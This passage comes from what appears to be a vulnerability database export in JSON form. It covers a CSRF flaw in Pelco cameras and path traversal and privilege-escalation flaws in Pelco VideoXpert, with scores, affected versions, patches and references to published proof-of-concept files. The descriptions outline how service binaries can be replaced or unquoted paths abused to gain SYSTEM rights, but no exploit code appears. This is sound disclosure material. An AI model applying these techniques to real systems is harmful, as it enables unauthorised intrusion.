"id": "ZSL-2017-5417",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42308",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "143314",
"trust": 0.1
},
{
"db": "SCHNEIDER",
"id": "SEVD-2018-058-01",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070076",
"trust": 0.1
},
{
"db": "ZSL",
"id": "ZSL-2017-5416",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7827",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070075",
"trust": 0.1
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16262"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015521"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-912"
},
{
"db": "NVD",
"id": "CVE-2018-7828"
}
]
},
"id": "VAR-201905-1040",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16262"
}
],
"trust": 2.3
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16262"
}
]
},
"last_update_date": "2025-01-30T19:43:39.282000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SEVD-2019-045-03",
"trust": 0.8,
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-045-03/"
},
{
"title": "Patch for SchneiderElectric1stGen.PelcoSarixEnhancedCamera and SpectraEnhancedPTZCamera Cross-Site Request Forgery Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/162751"
},
{
"title": "Schneider Electric 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera Fixes for cross-site request forgery vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=92890"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16262"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015521"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-912"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015521"
},
{
"db": "NVD",
"id": "CVE-2018-7828"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2019-045-03/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7828"
},
{
"trust": 0.9,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7828"
},
{
"trust": 0.7,
"url": "https://www.exploit-db.com/exploits/42307/"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42309/"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070080"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143315"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129667"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7829"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42308/"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070076"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143314"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129666"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7236"
},
{
"trust": 0.1,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2018-058-01/"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070075"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143313"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129665"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7827"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/dot1x/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/system/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/events/handlers/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/snmp/update\""
},
{
"trust": 0.1,
"url": "https://www.pelco.com"
},
{
"trust": 0.1,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2017-5415.php"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16262"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015521"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-912"
},
{
"db": "NVD",
"id": "CVE-2018-7828"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16262"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015521"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-912"
},
{
"db": "NVD",
"id": "CVE-2018-7828"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-06-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16262"
},
{
"date": "2019-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015521"
},
{
"date": "2017-07-11T04:32:15",
"db": "PACKETSTORM",
"id": "143313"
},
{
"date": "2019-05-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-912"
},
{
"date": "2019-05-22T20:29:01.307000",
"db": "NVD",
"id": "CVE-2018-7828"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-06-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16262"
},
{
"date": "2019-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015521"
},
{
"date": "2019-05-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-912"
},
{
"date": "2024-11-21T04:12:48.500000",
"db": "NVD",
"id": "CVE-2018-7828"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-912"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Schneider Electric 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera Cross-Site Request Forgery Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16262"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-912"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-912"
}
],
"trust": 0.6
}
}
VAR-201801-1066
Vulnerability from variot - Updated: 2024-11-23 21:39A Path Traversal issue was discovered in Schneider Electric Pelco VideoXpert Enterprise all versions prior to 2.1. By sniffing communications, an unauthorized person can execute a directory traversal attack resulting in authentication bypass or session hijack. VideoXpert is a video management solution designed for scalability, suitable for any size monitoring operation. Attackers can use the vulnerabilities to obtain sensitive information. PelcoVideoXpertEnterprise is an enterprise video management system. SchneiderElectricPelcoVideoXpertEnterprise has a directory traversal vulnerability. Information harvested may aid in launching further attacks.
Versions prior to Pelco VideoXpert Enterprise 2.1 are vulnerable. The vulnerability existdue to the improper permissions, with the 'F' flag (full) for the'Users' group, for several binary files. The service is installedby default to start on system boot with LocalSystem privileges.Attackers can replace the binary with their rootkit, and on rebootthey get SYSTEM privileges.
VideoXpert services also suffer from an unquoted search path issueimpacting the 'VideoXpert Core' and 'VideoXpert Exports' servicesfor Windows deployed as part of the VideoXpert Setup bundle. A successful attempt would require the local user to be able to inserttheir code in the system root path undetected by the OS or other securityapplications where it could potentially be executed during applicationstartup or reboot. If successful, the local user’s code would executewith the elevated privileges of the application.Tested on: Microsoft Windows 7 Professional SP1 (EN)
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201801-1066",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "pelco videoxpert",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.1"
},
{
"model": "pelco videoxpert",
"scope": "eq",
"trust": 0.8,
"vendor": "schneider electric",
"version": "enterprise 2.1"
},
{
"model": "pelco videoxpert",
"scope": "lt",
"trust": 0.8,
"vendor": "schneider electric",
"version": "all versions"
},
{
"model": "electric pelco videoxpert",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": "2.0.41"
},
{
"model": "electric pelco videoxpert",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": "1.14.7"
},
{
"model": "electric pelco videoxpert",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": "1.12.105"
},
{
"model": "electric pelco videoxpert enterprise",
"scope": "lt",
"trust": 0.6,
"vendor": "schneider",
"version": "2.1"
},
{
"model": "pelco videoxpert enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "schneider electric",
"version": "2.0"
},
{
"model": "pelco videoxpert enterprise",
"scope": "ne",
"trust": 0.3,
"vendor": "schneider electric",
"version": "2.1"
},
{
"model": "pelco videoxpert missing encryption of sensitive information",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "2.0.41"
},
{
"model": "pelco videoxpert missing encryption of sensitive information",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "1.14.7"
},
{
"model": "pelco videoxpert missing encryption of sensitive information",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "1.12.105"
},
{
"model": "pelco videoxpert core admin portal directory traversal",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "2.0.41"
},
{
"model": "pelco videoxpert core admin portal directory traversal",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "1.14.7"
},
{
"model": "pelco videoxpert core admin portal directory traversal",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "1.12.105"
},
{
"model": "pelco videoxpert privilege escalations",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "core software 1.12.105"
},
{
"model": "pelco videoxpert privilege escalations",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "media gateway software 1.12.26"
},
{
"model": "pelco videoxpert privilege escalations",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "exports 1.12"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5420"
},
{
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"db": "ZSL",
"id": "ZSL-2017-5418"
},
{
"db": "CNVD",
"id": "CNVD-2017-23308"
},
{
"db": "CNVD",
"id": "CNVD-2017-38302"
},
{
"db": "BID",
"id": "102338"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011851"
},
{
"db": "NVD",
"id": "CVE-2017-9964"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:schneider_electric:pelco_videoxpert",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011851"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vulnerability discovered by Gjoko Krstic",
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5420"
},
{
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"db": "ZSL",
"id": "ZSL-2017-5418"
}
],
"trust": 0.3
},
"cve": "CVE-2017-9964",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2017-9964",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2017-23308",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 4.9,
"id": "CNVD-2017-38302",
"impactScore": 7.8,
"integrityImpact": "COMPLETE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:H/Au:N/C:P/I:C/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 1.6,
"id": "CVE-2017-9964",
"impactScore": 4.7,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-9964",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2017-9964",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2017-23308",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2017-38302",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201706-1084",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "ZSL",
"id": "ZSL-2017-5420",
"trust": 0.1,
"value": "(3/5)"
},
{
"author": "ZSL",
"id": "ZSL-2017-5419",
"trust": 0.1,
"value": "(4/5)"
},
{
"author": "ZSL",
"id": "ZSL-2017-5418",
"trust": 0.1,
"value": "(3/5)"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5420"
},
{
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"db": "ZSL",
"id": "ZSL-2017-5418"
},
{
"db": "CNVD",
"id": "CNVD-2017-23308"
},
{
"db": "CNVD",
"id": "CNVD-2017-38302"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011851"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1084"
},
{
"db": "NVD",
"id": "CVE-2017-9964"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A Path Traversal issue was discovered in Schneider Electric Pelco VideoXpert Enterprise all versions prior to 2.1. By sniffing communications, an unauthorized person can execute a directory traversal attack resulting in authentication bypass or session hijack. VideoXpert is a video management solution designed for scalability, suitable for any size monitoring operation. Attackers can use the vulnerabilities to obtain sensitive information. PelcoVideoXpertEnterprise is an enterprise video management system. SchneiderElectricPelcoVideoXpertEnterprise has a directory traversal vulnerability. Information harvested may aid in launching further attacks. \nVersions prior to Pelco VideoXpert Enterprise 2.1 are vulnerable. The vulnerability existdue to the improper permissions, with the \u0027F\u0027 flag (full) for the\u0027Users\u0027 group, for several binary files. The service is installedby default to start on system boot with LocalSystem privileges.Attackers can replace the binary with their rootkit, and on rebootthey get SYSTEM privileges.\u003cbr/\u003e\u003cbr/\u003eVideoXpert services also suffer from an unquoted search path issueimpacting the \u0027VideoXpert Core\u0027 and \u0027VideoXpert Exports\u0027 servicesfor Windows deployed as part of the VideoXpert Setup bundle. A successful attempt would require the local user to be able to inserttheir code in the system root path undetected by the OS or other securityapplications where it could potentially be executed during applicationstartup or reboot. If successful, the local user\u2019s code would executewith the elevated privileges of the application.Tested on: Microsoft Windows 7 Professional SP1 (EN)",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-9964"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011851"
},
{
"db": "CNVD",
"id": "CNVD-2017-23308"
},
{
"db": "CNVD",
"id": "CNVD-2017-38302"
},
{
"db": "BID",
"id": "102338"
},
{
"db": "ZSL",
"id": "ZSL-2017-5420"
},
{
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"db": "ZSL",
"id": "ZSL-2017-5418"
}
],
"trust": 3.24
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/pelcovideoxpert_cookie.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.zeroscience.mk/codes/pelcovideoxpert_fd.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.zeroscience.mk/codes/pelcovideoxpert_eop.txt",
"trust": 0.1,
"type": "poc"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5420"
},
{
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"db": "ZSL",
"id": "ZSL-2017-5418"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "ICS CERT",
"id": "ICSA-17-355-02",
"trust": 3.6
},
{
"db": "NVD",
"id": "CVE-2017-9964",
"trust": 3.4
},
{
"db": "BID",
"id": "102338",
"trust": 1.6
},
{
"db": "SCHNEIDER",
"id": "SEVD-2017-339-01",
"trust": 1.3
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011851",
"trust": 0.8
},
{
"db": "EXPLOIT-DB",
"id": "42312",
"trust": 0.7
},
{
"db": "EXPLOITDB",
"id": "42312",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2017-23308",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2017-38302",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "38558",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1084",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2017122204",
"trust": 0.3
},
{
"db": "ZSL",
"id": "ZSL-2017-5419",
"trust": 0.2
},
{
"db": "AUSCERT",
"id": "ESB-2018.0004",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070079",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "143318",
"trust": 0.1
},
{
"db": "ZSL",
"id": "ZSL-2017-5420",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070077",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2017-9965",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "143317",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42311",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070078",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2017-9966",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "143316",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42310",
"trust": 0.1
},
{
"db": "ZSL",
"id": "ZSL-2017-5418",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5420"
},
{
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"db": "ZSL",
"id": "ZSL-2017-5418"
},
{
"db": "CNVD",
"id": "CNVD-2017-23308"
},
{
"db": "CNVD",
"id": "CNVD-2017-38302"
},
{
"db": "BID",
"id": "102338"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011851"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1084"
},
{
"db": "NVD",
"id": "CVE-2017-9964"
}
]
},
"id": "VAR-201801-1066",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-23308"
},
{
"db": "CNVD",
"id": "CNVD-2017-38302"
}
],
"trust": 2.047222233333333
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-23308"
},
{
"db": "CNVD",
"id": "CNVD-2017-38302"
}
]
},
"last_update_date": "2024-11-23T21:39:52.905000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "VideoXpert Enterprise Video Management System",
"trust": 0.8,
"url": "https://www.pelco.com/video-management-system/videoxpert"
},
{
"title": "SchneiderElectricPelcoVideoXpertEnterprise directory traversal vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/111989"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38302"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011851"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011851"
},
{
"db": "NVD",
"id": "CVE-2017-9964"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.6,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-17-355-02"
},
{
"trust": 1.3,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2017-339-01/"
},
{
"trust": 1.3,
"url": "http://www.securityfocus.com/bid/102338"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-9964"
},
{
"trust": 0.8,
